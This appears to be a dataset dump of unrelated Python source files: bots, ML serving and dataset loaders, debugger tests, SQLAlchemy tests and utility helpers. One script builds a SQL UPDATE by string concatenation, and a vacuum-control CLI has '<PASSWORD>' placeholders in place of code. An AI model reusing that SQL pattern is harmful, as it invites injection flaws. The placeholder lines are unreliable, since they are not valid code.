id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
11481120
|
from os import environ
def singleton(cls, *args, **kw):
instances = {}
def _singleton():
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return _singleton
@singleton
class Configuration(object):
KEY_API_URL = "API_API_URL"
KEY_DATACOLLECTOR_URL = "DATACOLLECTOR_API_URL"
def get_value(self, key):
"""Returns configuration value for the given key, or None if value was
not found.
Arguments:
key (str)
Returns:
str
"""
assert key, 'Missing key to retrieve parameter value.'
return environ[key]
def get_required_value(self, key):
"""Returns configuration value for the given key, or exception if
value was not found.
Arguments:
key (str)
Returns:
str
"""
value = Configuration().get_value(key)
assert value, 'Required value not found for key [%s].' % key
return value
|
11481143
|
from os import environ
from dotenv import load_dotenv
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
from bin.handlers import *
if 'TELEGRAM_TOKEN' not in environ:
load_dotenv()
TOKEN = environ.get('TELEGRAM_TOKEN')
def main():
updater = Updater(
TOKEN, workers=32, use_context=True,
request_kwargs={'read_timeout': 60, 'connect_timeout': 60}
)
handlers = [
CommandHandler('start', start_handler, run_async=True),
CommandHandler('help', help_handler, run_async=True),
CommandHandler('changes', changes_handler, run_async=True),
CommandHandler('cookbook', cookbook_handler, run_async=True),
MessageHandler(
Filters.regex('(?i)(^alt:)'),
alt_handler, run_async=True
),
MessageHandler(
Filters.regex('(?i)(^vaporize:)'),
vaporize_handler, run_async=True
),
MessageHandler(Filters.reply, reply_handler, run_async=True),
MessageHandler(Filters.text, main_handler, run_async=True),
MessageHandler(Filters.all, all_handler, run_async=True),
]
dispatcher = updater.dispatcher
dispatcher.add_error_handler(error_handler)
for handler in handlers:
dispatcher.add_handler(handler)
if environ.get('ENVIRONMENT', None) == 'HEROKU':
print('Starting Webhook')
updater.start_webhook(
listen='0.0.0.0',
port=int(environ.get('PORT')),
url_path=TOKEN,
webhook_url="https://dankbot-tg.herokuapp.com/" + TOKEN
)
# updater.bot.setWebhook('https://dankbot-tg.herokuapp.com/' + TOKEN)
updater.idle()
else:
print("Starting Polling")
updater.start_polling()
if __name__ == '__main__':
main()
|
11481182
|
import base64
import io
import uuid
from logging import getLogger
from typing import Any, Dict
import requests
from fastapi import APIRouter, BackgroundTasks
from PIL import Image
from src.app.backend import background_job, store_data_job
from src.app.backend.data import Data
from src.configurations import ModelConfigurations
logger = getLogger(__name__)
router = APIRouter()
@router.get("/health")
def health() -> Dict[str, str]:
return {"health": "ok"}
@router.get("/metadata")
def metadata() -> Dict[str, Any]:
model_spec_name = ModelConfigurations.model_spec_name
address = ModelConfigurations.address
port = ModelConfigurations.rest_port
serving_address = f"http://{address}:{port}/v1/models/{model_spec_name}/versions/0/metadata"
response = requests.get(serving_address)
return response.json()
@router.get("/label")
def label() -> Dict[int, str]:
return ModelConfigurations.labels
@router.get("/predict/test")
def predict_test(background_tasks: BackgroundTasks) -> Dict[str, str]:
job_id = str(uuid.uuid4())[:6]
data = Data()
data.image_data = ModelConfigurations.sample_image
background_job.save_data_job(data.image_data, job_id, background_tasks, True)
return {"job_id": job_id}
@router.post("/predict")
def predict(data: Data, background_tasks: BackgroundTasks) -> Dict[str, str]:
image = base64.b64decode(str(data.image_data))
io_bytes = io.BytesIO(image)
data.image_data = Image.open(io_bytes)
job_id = str(uuid.uuid4())[:6]
background_job.save_data_job(
data=data.image_data,
job_id=job_id,
background_tasks=background_tasks,
enqueue=True,
)
return {"job_id": job_id}
@router.get("/job/{job_id}")
def prediction_result(job_id: str) -> Dict[str, Dict[str, str]]:
result = {job_id: {"prediction": ""}}
data = store_data_job.get_data_redis(job_id)
result[job_id]["prediction"] = data
return result
|
11481198
|
import configparser
import itertools
import os
import platform
import random
import re
import click
from pycountry_convert import country_alpha2_to_continent_code
from sucks import *
class FrequencyParamType(click.ParamType):
name = 'frequency'
RATIONAL_PATTERN = re.compile(r'([.0-9]+)/([.0-9]+)')
def convert(self, value, param, ctx):
result = None
try:
search = self.RATIONAL_PATTERN.search(value)
if search:
result = float(search.group(1)) / float(search.group(2))
else:
try:
result = float(value)
except ValueError:
pass
except (ValueError, ArithmeticError):
pass
if result is None:
self.fail('%s is not a valid frequency' % value, param, ctx)
if 0 <= result <= 1:
return result
self.fail('%s is not between 0 and 1' % value, param, ctx)
FREQUENCY = FrequencyParamType()
class BotWait():
pass
def wait(self, bot):
raise NotImplementedError()
class TimeWait(BotWait):
def __init__(self, seconds):
super().__init__()
self.seconds = seconds
def wait(self, bot):
click.echo("waiting for " + str(self.seconds) + "s")
time.sleep(self.seconds)
class StatusWait(BotWait):
def __init__(self, wait_on, wait_for):
super().__init__()
self.wait_on = wait_on
self.wait_for = wait_for
def wait(self, bot):
if not hasattr(bot, self.wait_on):
raise ValueError("object " + bot + " does not have method " + self.wait_on)
logging.debug("waiting on " + self.wait_on + " for value " + self.wait_for)
while getattr(bot, self.wait_on) != self.wait_for:
time.sleep(0.5)
logging.debug("wait complete; " + self.wait_on + " is now " + self.wait_for)
class CliAction:
def __init__(self, vac_command, terminal=False, wait=None):
self.vac_command = vac_command
self.terminal = terminal
self.wait = wait
def config_file():
if platform.system() == 'Windows':
return os.path.join(os.getenv('APPDATA'), 'sucks.conf')
else:
return os.path.expanduser('~/.config/sucks.conf')
def config_file_exists():
return os.path.isfile(config_file())
def read_config():
parser = configparser.ConfigParser()
with open(config_file()) as fp:
parser.read_file(itertools.chain(['[global]'], fp), source=config_file())
return parser['global']
def write_config(config):
os.makedirs(os.path.dirname(config_file()), exist_ok=True)
with open(config_file(), 'w') as fp:
for key in config:
fp.write(key + '=' + str(config[key]) + "\n")
def current_country():
# noinspection PyBroadException
try:
return requests.get('http://ipinfo.io/json').json()['country'].lower()
except:
return 'us'
def continent_for_country(country_code):
return country_alpha2_to_continent_code(country_code.upper()).lower()
def should_run(frequency):
if frequency is None:
return True
n = random.random()
result = n <= frequency
logging.debug("tossing coin: {:0.3f} <= {:0.3f}: {}".format(n, frequency, result))
return result
@click.group(chain=True)
@click.option('--debug/--no-debug', default=False)
def cli(debug):
level = logging.DEBUG if debug else logging.ERROR
logging.basicConfig(level=level, format='%(levelname)-8s %(message)s')
@cli.command(help='logs in with specified email; run this first')
@click.option('--email', prompt='Ecovacs app email')
@click.option('--password', prompt='Ecovacs app password', hide_input=True)
@click.option('--country-code', prompt='your two-letter country code', default=lambda: current_country())
@click.option('--continent-code', prompt='your two-letter continent code',
default=lambda: continent_for_country(click.get_current_context().params['country_code']))
def login(email, password, country_code, continent_code):
if config_file_exists() and not click.confirm('overwrite existing config?'):
click.echo("Skipping login.")
exit(0)
config = OrderedDict()
password_hash = <PASSWORD>(password)
device_id = EcoVacsAPI.md5(str(time.time()))
try:
EcoVacsAPI(device_id, email, password_hash, country_code, continent_code)
except ValueError as e:
click.echo(e.args[0])
exit(1)
config['email'] = email
config['password_hash'] = <PASSWORD>
config['device_id'] = device_id
config['country'] = country_code.lower()
config['continent'] = continent_code.lower()
write_config(config)
click.echo("Config saved.")
exit(0)
@cli.command(help='auto-cleans for the specified number of minutes')
@click.option('--frequency', '-f', type=FREQUENCY, help='frequency with which to run; e.g. 0.5 or 3/7')
@click.argument('minutes', type=click.FLOAT)
def clean(frequency, minutes):
if should_run(frequency):
return CliAction(Clean(), wait=TimeWait(minutes * 60))
@cli.command(help='cleans room edges for the specified number of minutes')
@click.option('--frequency', '-f', type=FREQUENCY, help='frequency with which to run; e.g. 0.5 or 3/7')
@click.argument('minutes', type=click.FLOAT)
def edge(frequency, minutes):
if should_run(frequency):
return CliAction(Edge(), wait=TimeWait(minutes * 60))
@cli.command(help='returns to charger')
def charge():
return charge_action()
def charge_action():
return CliAction(Charge(), terminal=True, wait=StatusWait('charge_status', 'charging'))
@cli.command(help='stops the robot in its current position')
def stop():
return CliAction(Stop(), terminal=True, wait=StatusWait('clean_status', 'stop'))
@cli.resultcallback()
def run(actions, debug):
actions = list(filter(None.__ne__, actions))
if actions and charge and not actions[-1].terminal:
actions.append(charge_action())
if not config_file_exists():
click.echo("Not logged in. Do 'click login' first.")
exit(1)
if debug:
logging.debug("will run {}".format(actions))
if actions:
config = read_config()
api = EcoVacsAPI(config['device_id'], config['email'], config['password_hash'],
config['country'], config['continent'])
vacuum = api.devices()[0]
vacbot = VacBot(api.uid, api.REALM, api.resource, api.user_access_token, vacuum, config['continent'])
vacbot.connect_and_wait_until_ready()
for action in actions:
click.echo("performing " + str(action.vac_command))
vacbot.run(action.vac_command)
action.wait.wait(vacbot)
vacbot.disconnect(wait=True)
click.echo("done")
if __name__ == '__main__':
cli()
|
11481216
|
import os
import sys
import json
from mindsdb.__about__ import __version__ # noqa: F401
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.utilities.fs import get_or_create_data_dir, create_dirs_recursive
from mindsdb.utilities.functions import args_parse, is_notebook
from mindsdb.utilities.telemetry import telemetry_file_exists, disable_telemetry
is_ray_worker = False
if sys.argv[0].endswith('ray/workers/default_worker.py'):
is_ray_worker = True
is_alembic = os.path.basename(sys.argv[0]).split('.')[0] == 'alembic'
if not is_ray_worker:
try:
if not is_notebook() and not is_alembic:
args = args_parse()
else:
args = None
except Exception:
# This fials in some notebooks ... check above for is_notebook is still needed because even if the exception is caught trying to read the arg still leads to failure in other notebooks... notebooks a
args = None
# ---- CHECK SYSTEM ----
if not (sys.version_info[0] >= 3 and sys.version_info[1] >= 6):
print("""
MindsDB server requires Python >= 3.6 to run
Once you have Python 3.6 installed you can tun mindsdb as follows:
1. create and activate venv:
python3.6 -m venv venv
source venv/bin/activate
2. install MindsDB:
pip3 install mindsdb
3. Run MindsDB
python3.6 -m mindsdb
More instructions in https://docs.mindsdb.com
""")
exit(1)
# --- VERSION MODE ----
if args is not None and args.version:
print(f'MindsDB {mindsdb_version}')
sys.exit(0)
# --- MODULE OR LIBRARY IMPORT MODE ----
if args is not None and args.config is not None:
config_path = args.config
with open(config_path, 'r') as fp:
user_config = json.load(fp)
else:
user_config = {}
config_path = 'absent'
os.environ['MINDSDB_CONFIG_PATH'] = config_path
if 'storage_dir' in user_config:
root_storage_dir = user_config['storage_dir']
os.environ['MINDSDB_STORAGE_DIR'] = root_storage_dir
elif os.environ.get('MINDSDB_STORAGE_DIR') is not None:
root_storage_dir = os.environ['MINDSDB_STORAGE_DIR']
else:
root_storage_dir = get_or_create_data_dir()
os.environ['MINDSDB_STORAGE_DIR'] = root_storage_dir
if os.path.isdir(root_storage_dir) is False:
os.makedirs(root_storage_dir)
if 'storage_db' in user_config:
os.environ['MINDSDB_DB_CON'] = user_config['storage_db']
elif os.environ.get('MINDSDB_DB_CON', '') == '':
os.environ['MINDSDB_DB_CON'] = 'sqlite:///' + os.path.join(os.environ['MINDSDB_STORAGE_DIR'], 'mindsdb.sqlite3.db') + '?check_same_thread=False&timeout=30'
from mindsdb.utilities.config import Config
mindsdb_config = Config()
create_dirs_recursive(mindsdb_config['paths'])
os.environ['DEFAULT_LOG_LEVEL'] = os.environ.get('DEFAULT_LOG_LEVEL', 'ERROR')
os.environ['LIGHTWOOD_LOG_LEVEL'] = os.environ.get('LIGHTWOOD_LOG_LEVEL', 'ERROR')
os.environ['MINDSDB_STORAGE_PATH'] = mindsdb_config['paths']['predictors']
if telemetry_file_exists(mindsdb_config['storage_dir']):
os.environ['CHECK_FOR_UPDATES'] = '0'
print('\n x telemetry disabled! \n')
elif os.getenv('CHECK_FOR_UPDATES', '1').lower() in ['0', 'false', 'False'] or mindsdb_config.get('cloud', False):
disable_telemetry(mindsdb_config['storage_dir'])
print('\n x telemetry disabled \n')
else:
print('\n ✓ telemetry enabled \n')
|
11481238
|
from __future__ import print_function
import gdbremote_testcase
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestGdbRemoteThreadsInStopReply(
gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
ENABLE_THREADS_IN_STOP_REPLY_ENTRIES = [
"read packet: $QListThreadsInStopReply#21",
"send packet: $OK#00",
]
def gather_stop_reply_threads(self, post_startup_log_lines, thread_count):
# Set up the inferior args.
inferior_args = []
for i in range(thread_count - 1):
inferior_args.append("thread:new")
inferior_args.append("sleep:10")
procs = self.prep_debug_monitor_and_inferior(
inferior_args=inferior_args)
# Assumes test_sequence has anything added needed to setup the initial state.
# (Like optionally enabling QThreadsInStopReply.)
if post_startup_log_lines:
self.test_sequence.add_log_lines(post_startup_log_lines, True)
self.test_sequence.add_log_lines([
"read packet: $c#63"
], True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
# Give threads time to start up, then break.
time.sleep(1)
self.reset_test_sequence()
self.test_sequence.add_log_lines(
[
"read packet: {}".format(
chr(3)),
{
"direction": "send",
"regex": r"^\$T([0-9a-fA-F]+)([^#]+)#[0-9a-fA-F]{2}$",
"capture": {
1: "stop_result",
2: "key_vals_text"}},
],
True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
# Wait until all threads have started.
threads = self.wait_for_thread_count(thread_count, timeout_seconds=3)
self.assertIsNotNone(threads)
self.assertEqual(len(threads), thread_count)
# Run, then stop the process, grab the stop reply content.
self.reset_test_sequence()
self.test_sequence.add_log_lines(["read packet: $c#63",
"read packet: {}".format(chr(3)),
{"direction": "send",
"regex": r"^\$T([0-9a-fA-F]+)([^#]+)#[0-9a-fA-F]{2}$",
"capture": {1: "stop_result",
2: "key_vals_text"}},
],
True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
# Parse the stop reply contents.
key_vals_text = context.get("key_vals_text")
self.assertIsNotNone(key_vals_text)
kv_dict = self.parse_key_val_dict(key_vals_text)
self.assertIsNotNone(kv_dict)
# Pull out threads from stop response.
stop_reply_threads_text = kv_dict.get("threads")
if stop_reply_threads_text:
return [int(thread_id, 16)
for thread_id in stop_reply_threads_text.split(",")]
else:
return []
def QListThreadsInStopReply_supported(self):
procs = self.prep_debug_monitor_and_inferior()
self.test_sequence.add_log_lines(
self.ENABLE_THREADS_IN_STOP_REPLY_ENTRIES, True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
@debugserver_test
def test_QListThreadsInStopReply_supported_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.QListThreadsInStopReply_supported()
@llgs_test
def test_QListThreadsInStopReply_supported_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.QListThreadsInStopReply_supported()
def stop_reply_reports_multiple_threads(self, thread_count):
# Gather threads from stop notification when QThreadsInStopReply is
# enabled.
stop_reply_threads = self.gather_stop_reply_threads(
self.ENABLE_THREADS_IN_STOP_REPLY_ENTRIES, thread_count)
self.assertEqual(len(stop_reply_threads), thread_count)
@debugserver_test
def test_stop_reply_reports_multiple_threads_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_multiple_threads(5)
@llgs_test
def test_stop_reply_reports_multiple_threads_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_multiple_threads(5)
def no_QListThreadsInStopReply_supplies_no_threads(self, thread_count):
# Gather threads from stop notification when QThreadsInStopReply is not
# enabled.
stop_reply_threads = self.gather_stop_reply_threads(None, thread_count)
self.assertEqual(len(stop_reply_threads), 0)
@debugserver_test
def test_no_QListThreadsInStopReply_supplies_no_threads_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.no_QListThreadsInStopReply_supplies_no_threads(5)
@llgs_test
def test_no_QListThreadsInStopReply_supplies_no_threads_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.no_QListThreadsInStopReply_supplies_no_threads(5)
def stop_reply_reports_correct_threads(self, thread_count):
# Gather threads from stop notification when QThreadsInStopReply is
# enabled.
stop_reply_threads = self.gather_stop_reply_threads(
self.ENABLE_THREADS_IN_STOP_REPLY_ENTRIES, thread_count)
self.assertEqual(len(stop_reply_threads), thread_count)
# Gather threads from q{f,s}ThreadInfo.
self.reset_test_sequence()
self.add_threadinfo_collection_packets()
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
threads = self.parse_threadinfo_packets(context)
self.assertIsNotNone(threads)
self.assertEqual(len(threads), thread_count)
# Ensure each thread in q{f,s}ThreadInfo appears in stop reply threads
for tid in threads:
self.assertTrue(tid in stop_reply_threads)
@debugserver_test
def test_stop_reply_reports_correct_threads_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_correct_threads(5)
@llgs_test
def test_stop_reply_reports_correct_threads_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_correct_threads(5)
|
11481244
|
import configparser
import pymysql
import urllib.request
parser = configparser.ConfigParser()
parser.read("../halite.ini")
DB_CONFIG = parser["database"]
db = pymysql.connect(host=DB_CONFIG["hostname"], user=DB_CONFIG['username'], passwd=DB_CONFIG['password'], db=DB_CONFIG['name'], cursorclass=pymysql.cursors.DictCursor)
cursor = db.cursor()
cursor.execute("select email, userID, organization from User")
users = cursor.fetchall()
orgs = [line.strip().split(" - ") for line in open("../website/organizationWhitelist.txt").readlines()]
for user in users:
if user["email"] == None:
continue
realUserOrg = "Other"
try:
emailDomain = user["email"].split("@")[1]
except:
pass
for org in orgs:
if emailDomain == org[1]:
realUserOrg = org[0]
break
if (realUserOrg != "Other" or user["organization"] == "") and realUserOrg != user["organization"]:
print("%s, %s, %s" % (realUserOrg, user["organization"], user["email"]))
cursor.execute("update User set organization = '"+realUserOrg+"' where userID="+str(user["userID"]))
db.commit()
|
11481259
|
import argparse
import yaml
import os
from pprint import pprint
from .flitton_fib_rs import run_config
def config_number_command() -> None:
parser = argparse.ArgumentParser(
description='Calculate Fibonacci numbers '
'using a config file')
parser.add_argument('--path', action='store',
type=str, required=True,
help="path to config file")
args = parser.parse_args()
with open(str(os.getcwd()) + "/" + args.path) as f:
config_data: dict = yaml.safe_load(f)
print("Here is the config data: ")
pprint(config_data)
print(f"Here is the result:")
pprint(run_config(config_data))
|
11481313
|
import argparse
import codecs
from markdown import Markdown
import pickle
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output", help="Output pickle file path",
default=None)
parser.add_argument("input", help="Input API Blueprint file")
args = parser.parse_args()
with codecs.open(args.input, "r", "utf-8") as fin:
txt = fin.read()
m = Markdown(extensions=["plueprint"])
m.set_output_format("apiblueprint")
api = m.convert(txt)
if args.output is not None:
with open(args.output, "wb") as fout:
pickle.dump(api, fout, protocol=-1)
else:
print(api)
print("Resource groups:")
for g in api:
print(" %s" % g)
print(" Resources:")
for r in g:
print(" %s" % r)
print(" Actions:")
for a in r:
print(" %s" % a)
if __name__ == "__main__":
main()
|
11481350
|
import os
import pickle
import torch
import torch.utils.data
from PIL import Image
import xml.etree.ElementTree as ET
from wetectron.structures.bounding_box import BoxList
from wetectron.structures.boxlist_ops import remove_small_boxes
from .coco import unique_boxes
class PascalVOCDataset(torch.utils.data.Dataset):
CLASSES = (
"__background__ ",
"aeroplane",
"bicycle",
"bird",
"boat",
"bottle",
"bus",
"car",
"cat",
"chair",
"cow",
"diningtable",
"dog",
"horse",
"motorbike",
"person",
"pottedplant",
"sheep",
"sofa",
"train",
"tvmonitor",
)
def __init__(self, data_dir, split, use_difficult=False, transforms=None, proposal_file=None):
self.root = data_dir
self.image_set = split
self.keep_difficult = use_difficult
self.transforms = transforms
self._annopath = os.path.join(self.root, "Annotations", "%s.xml")
self._imgpath = os.path.join(self.root, "JPEGImages", "%s.jpg")
self._imgsetpath = os.path.join(self.root, "ImageSets", "Main", "%s.txt")
with open(self._imgsetpath % self.image_set) as f:
self.ids = f.readlines()
self.ids = [x.strip("\n") for x in self.ids]
self.id_to_img_map = {k: v for k, v in enumerate(self.ids)}
cls = PascalVOCDataset.CLASSES
self.class_to_ind = dict(zip(cls, range(len(cls))))
self.categories = dict(zip(range(len(cls)), cls))
# Include proposals from a file
if proposal_file is not None:
print('Loading proposals from: {}'.format(proposal_file))
with open(proposal_file, 'rb') as f:
self.proposals = pickle.load(f, encoding='latin1')
# self.id_field = 'indexes' if 'indexes' in self.proposals else 'ids' # compat fix
# _sort_proposals(self.proposals, self.id_field)
self.top_k = -1
else:
self.proposals = None
def get_origin_id(self, index):
img_id = self.ids[index]
return img_id
def __getitem__(self, index):
img_id = self.ids[index]
img = Image.open(self._imgpath % img_id).convert("RGB")
if not os.path.exists(self._annopath % img_id):
target = None
else:
target = self.get_groundtruth(index)
target = target.clip_to_image(remove_empty=True)
if self.proposals is not None:
if '_' in self.ids[index] and self.image_set == "test" and "2012" in self.root :
img_id = int(self.ids[index].split('_')[1])
else:
img_id = int(self.ids[index])
id_field = 'indexes' if 'indexes' in self.proposals else 'ids' # compat fix
roi_idx = self.proposals[id_field].index(img_id)
rois = self.proposals['boxes'][roi_idx]
# scores = self.proposals['scores'][roi_idx]
# assert rois.shape[0] == scores.shape[0]
# remove duplicate, clip, remove small boxes, and take top k
keep = unique_boxes(rois)
rois = rois[keep, :]
# scores = scores[keep]
rois = BoxList(torch.tensor(rois), img.size, mode="xyxy")
rois = rois.clip_to_image(remove_empty=True)
# TODO: deal with scores
rois = remove_small_boxes(boxlist=rois, min_size=2)
if self.top_k > 0:
rois = rois[[range(self.top_k)]]
# scores = scores[:self.top_k]
else:
rois = None
if self.transforms is not None:
img, target, rois = self.transforms(img, target, rois)
return img, target, rois, index
def __len__(self):
return len(self.ids)
def get_groundtruth(self, index):
img_id = self.ids[index]
anno = ET.parse(self._annopath % img_id).getroot()
anno = self._preprocess_annotation(anno)
height, width = anno["im_info"]
target = BoxList(anno["boxes"], (width, height), mode="xyxy")
target.add_field("labels", anno["labels"])
target.add_field("difficult", anno["difficult"])
return target
def _preprocess_annotation(self, target):
boxes = []
gt_classes = []
difficult_boxes = []
TO_REMOVE = 1
for obj in target.iter("object"):
difficult = int(obj.find("difficult").text) == 1
if not self.keep_difficult and difficult:
continue
name = obj.find("name").text.lower().strip()
bb = obj.find("bndbox")
# Make pixel indexes 0-based
# Refer to "https://github.com/rbgirshick/py-faster-rcnn/blob/master/lib/datasets/pascal_voc.py#L208-L211"
box = [
bb.find("xmin").text,
bb.find("ymin").text,
bb.find("xmax").text,
bb.find("ymax").text,
]
bndbox = tuple(
map(lambda x: x - TO_REMOVE, list(map(int, box)))
)
boxes.append(bndbox)
gt_classes.append(self.class_to_ind[name])
difficult_boxes.append(difficult)
size = target.find("size")
im_info = tuple(map(int, (size.find("height").text, size.find("width").text)))
res = {
"boxes": torch.tensor(boxes, dtype=torch.float32),
"labels": torch.tensor(gt_classes),
"difficult": torch.tensor(difficult_boxes),
"im_info": im_info,
}
return res
def get_img_info(self, index):
img_id = self.ids[index]
file_name = "JPEGImages/%s.jpg" % img_id
if os.path.exists(self._annopath % img_id):
anno = ET.parse(self._annopath % img_id).getroot()
size = anno.find("size")
im_info = tuple(map(int, (size.find("height").text, size.find("width").text)))
return {"height": im_info[0], "width": im_info[1], "file_name": file_name}
else:
name = os.path.join(self.root, file_name)
img = Image.open(name).convert("RGB")
return {"height": img.size[1], "width": img.size[0], "file_name": file_name}
def map_class_id_to_class_name(self, class_id):
return PascalVOCDataset.CLASSES[class_id]
|
11481387
|
import pytest
import sqlalchemy as sa
from sqlalchemy_utils import aggregated
@pytest.fixture
def Catalog(Base):
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column(sa.Integer, primary_key=True)
@aggregated(
'categories.sub_categories.products',
sa.Column(sa.Integer, default=0)
)
def product_count(self):
return sa.func.count('1')
categories = sa.orm.relationship('Category', backref='catalog')
return Catalog
@pytest.fixture
def Category(Base):
class Category(Base):
__tablename__ = 'category'
id = sa.Column(sa.Integer, primary_key=True)
catalog_id = sa.Column(sa.Integer, sa.ForeignKey('catalog.id'))
sub_categories = sa.orm.relationship(
'SubCategory', backref='category'
)
return Category
@pytest.fixture
def SubCategory(Base):
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column(sa.Integer, primary_key=True)
category_id = sa.Column(sa.Integer, sa.ForeignKey('category.id'))
products = sa.orm.relationship('Product', backref='sub_category')
return SubCategory
@pytest.fixture
def Product(Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column(sa.Integer, primary_key=True)
price = sa.Column(sa.Numeric)
sub_category_id = sa.Column(
sa.Integer, sa.ForeignKey('sub_category.id')
)
return Product
@pytest.fixture
def init_models(Catalog, Category, SubCategory, Product):
pass
@pytest.fixture
def catalog_factory(Product, SubCategory, Category, Catalog, session):
def catalog_factory():
product = Product()
sub_category = SubCategory(
products=[product]
)
category = Category(sub_categories=[sub_category])
catalog = Catalog(categories=[category])
session.add(catalog)
return catalog
return catalog_factory
@pytest.mark.usefixtures('postgresql_dsn')
class Test3LevelDeepOneToMany(object):
def test_assigns_aggregates(self, session, catalog_factory):
catalog = catalog_factory()
session.commit()
session.refresh(catalog)
assert catalog.product_count == 1
def catalog_factory(
self,
session,
Product,
SubCategory,
Category,
Catalog
):
product = Product()
sub_category = SubCategory(
products=[product]
)
category = Category(sub_categories=[sub_category])
catalog = Catalog(categories=[category])
session.add(catalog)
return catalog
def test_only_updates_affected_aggregates(
self,
session,
catalog_factory,
Product
):
catalog = catalog_factory()
catalog2 = catalog_factory()
session.commit()
# force set catalog2 product_count to zero in order to check if it gets
# updated when the other catalog's product count gets updated
session.execute(
'UPDATE catalog SET product_count = 0 WHERE id = %d'
% catalog2.id
)
catalog.categories[0].sub_categories[0].products.append(
Product()
)
session.commit()
session.refresh(catalog)
session.refresh(catalog2)
assert catalog.product_count == 2
assert catalog2.product_count == 0
|
11481407
|
from struct import pack, unpack
from socket import inet_aton, inet_ntoa
def dec2dot(dec):
'''
convert ip address from decimal format to dotted-quad format
'''
if dec>0xFFFFFFFF:
dec = 0xFFFFFFFF
ip = pack('!L', dec)
return inet_ntoa(ip)
def dot2dec(dot):
'''
convert ip address from dotted-quad format to decimal format
'''
ip = inet_aton(dot)
return unpack('!L', ip)[0]
def mac2byte(addr):
'''
Convert MAC address to byte
'''
mac = []
byte = ''
if ':' in addr:
mac = addr.split(':')
elif '-' in addr:
mac = addr.split('-')
else:
raise ValueError('error: MAC address not valid')
for m in mac:
byte += chr(int(m, 16))
return byte
def byte2mac(addr):
'''
Convert byte mac address to XX:XX:XX:XX:XX:XX
'''
mac = ''
for b in addr:
byte = hex(ord(b)) # '0xXX', '0xX'
byte = byte.replace('x', '')
if len(byte)>2:
mac += byte[1:] + ':'
else:
mac += byte + ':'
return mac.strip(':')
|
11481410
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms, models
from torchvision.transforms.functional import resize, pad
from .identifier import ImageCharacterIdentifierBBox
from ..module import ImageBBEncoder, Similarity
from ..util import download
from .res18_single import Identity, Normalize, Res18Normalized
class PadResize(object):
def __init__(self, size, fill=0, padding_mode="constant", interpolation=2):
self.fill = fill
self.padding_mode = padding_mode
self.size = size
self.interpolation = interpolation
def __call__(self, img):
width, height = img.size
max_size = max(width, height)
left, right, top, bottom = 0, 0, 0, 0
if width > height:
top = bottom = (width - height) // 2
if (width - height) % 2 == 1:
top += 1
elif height > width:
left = right = (height - width) // 2
if (height - width) % 2 == 1:
left += 1
img = pad(img, (left, top, right, bottom), fill=self.fill,
padding_mode=self.padding_mode)
img = resize(img, size=self.size, interpolation=self.interpolation)
return img
class Res18_CharacterIdentifier_BBox(ImageCharacterIdentifierBBox):
def __init__(self, base_dir=None):
model_fn = download(
"https://github.com/kosuke1701/character-reid/releases/download/0.0/0716_bbox.mdl",
"0716_bbox.mdl"
)
saved_models = torch.load(model_fn, map_location="cpu")
state_dict = {key.replace("trunk", "model.0"): val
for key, val in saved_models["trunk"].items()}
state_dict.update(saved_models["trunk"])
state_dict["embedder.1.weight"] = saved_models["embedder"]["module.0.weight"]
state_dict["embedder.1.bias"] = saved_models["embedder"]["module.0.bias"]
state_dict["model.1.1.weight"] = saved_models["embedder"]["module.0.weight"]
state_dict["model.1.1.bias"] = saved_models["embedder"]["module.0.bias"]
model = Res18Normalized(0.0, 500)
model.load_state_dict(state_dict)
transform = [
PadResize(224),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
]
transform = transforms.Compose(transform)
encoder = ImageBBEncoder(model, post_trans=transform,
scale=1.5)
similarity = Similarity(sim_func="L2")
super().__init__(encoder, similarity)
|
11481419
|
from __future__ import absolute_import, division, print_function
from scitbx.array_family import flex
import iotbx.phil
import mmtbx.polygon
import libtbx, os, re, sys
from libtbx.utils import Sorry
from libtbx import easy_pickle
from six.moves import range
keys_to_show = ["r_work", "r_free",
"pdb_header_r_work", "pdb_header_r_free",
"r_work_cutoffs", "r_free_cutoffs",
"completeness_in_range", "completeness_d_min_inf", "completeness_6A_inf",
"adp_mean_all", "adp_min_all", "adp_max_all",
"wilson_b", "solvent_content_via_mask",
"bond_rmsd", "bond_max_deviation", "angle_rmsd", "angle_max_deviation",
"dihedral_rmsd", "dihedral_max_deviation",
"planarity_rmsd", "planarity_max_deviation",
"chirality_rmsd", "chirality_max_deviation",
"rama_favored", "rama_allowed", "rama_outliers",
"rotamer_outliers", "clashscore"]
other_numerical_keys = ["high_resolution", "low_resolution",
'adp_min_backbone', 'adp_min_sidechain', 'adp_min_solvent',
'adp_max_backbone', 'adp_max_sidechain', 'adp_max_solvent',
'adp_mean_backbone', 'adp_mean_sidechain', 'adp_mean_solvent',
'unit_cell_volume']
default_keys = ["r_work", "r_free", "adp_mean_all", "bond_rmsd", "angle_rmsd",
"clashscore"]
key_captions = ["R-work", "R-free", "R-work (PDB)", "R-free (PDB)",
